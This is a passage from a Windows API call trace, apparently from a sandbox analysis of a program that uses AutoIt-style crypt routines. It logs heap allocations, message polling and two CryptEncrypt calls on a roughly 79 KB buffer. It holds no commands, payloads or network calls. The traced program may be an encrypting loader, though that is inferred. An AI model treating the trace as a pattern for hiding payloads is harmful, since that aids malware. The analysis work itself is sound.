lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0227.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0227.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13541) returned 0x2f14818 [0227.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54dc8 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0227.833] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f58 [0227.833] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e550d8 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.834] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.834] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13541) returned 0x2f3b2b8 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.835] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f788 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0227.835] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0227.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f760 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.836] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f738 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0227.836] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0227.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0227.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.837] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0227.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.838] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0227.838] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0227.838] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0227.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f350 | out: hHeap=0x970000) returned 1 [0227.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0227.839] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.839] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0227.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04150 | out: hHeap=0x970000) returned 1 [0227.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0227.839] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0227.839] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.839] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0227.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.840] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0227.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.840] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0227.840] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0227.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0227.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0227.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0227.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.887] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0227.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043f0 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.888] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.888] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.890] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0227.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51340 [0227.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51340, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0227.891] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13541, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13548) returned 1 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552d8 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552f8 [0227.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0227.891] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0227.891] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0227.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f350 [0227.892] CharLowerBuffW (in: lpsz="byte[79176]", cchLength=0xb | out: lpsz="byte[79176]") returned 0xb [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0227.892] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0227.892] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.896] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.896] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.896] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.898] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0227.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0227.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51358, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0227.898] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x13541, dwBufLen=0x13548 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0x13548) returned 1 [0227.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.901] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.902] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.902] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0227.903] PeekMessageW (in: lpMsg=0x8cf158, 